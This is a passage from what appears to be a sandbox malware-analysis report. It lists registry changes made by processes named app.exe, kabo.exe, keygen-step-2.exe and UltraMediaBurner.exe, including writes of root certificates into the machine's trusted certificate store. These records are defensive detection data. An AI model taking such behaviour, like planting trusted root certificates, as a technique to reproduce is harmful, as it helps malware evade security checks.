Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" app.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 rundll32.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{F5B59CD4-40B1-4A38-87C3-A2888CC7419E}Machine\SOFTWARE\Policies\Microsoft rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" app.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeFree.exeUltraMediaBurner.exesvchost.exeMicrosoftEdgeCP.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\ = "754" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "4440" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "91" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{509A7326-C45B-477E-A151-3036316530DC}\InprocHandler32\ = "ole32.dll" Free.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000001afd97be748fe71a5c04eadf9721bf96fa559a65c81429d069c48bb78ff1e64623b63b585f843af6b4c5b635defde53ce96147634512335d436c0788521a6b545edc69fd4732e2bafa5ba97ba6203df45bb8c79baffee05bcb1c MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 89ffac9a2f36d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 UltraMediaBurner.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "6260" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 98003100000000009452a7ae110050524f4752417e320000800009000400efbe724a6fa89452a7ae2e000000380400000000010000000000000000005600000000003c38fc00500072006f006700720061006d002000460069006c0065007300200028007800380036002900000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003700000018000000 UltraMediaBurner.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = f0cecac54447d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{509A7326-C45B-477E-A151-3036316530DC}\InprocHandler32 Free.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 79e33f942f36d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance UltraMediaBurner.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\0\3\MRUListEx = ffffffff Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\Total = "9" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg UltraMediaBurner.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\dollarsurvey.org MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "144" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 06c8e9c82f36d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{A5D35274-2F7B-455A-AB68-10B9A7316591}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\Total = "91" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\Total = "1072" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = 00000000ffffffff Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\ = "722" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 -
Processes:
kabo.exekeygen-step-2.exeapp.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 kabo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 kabo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 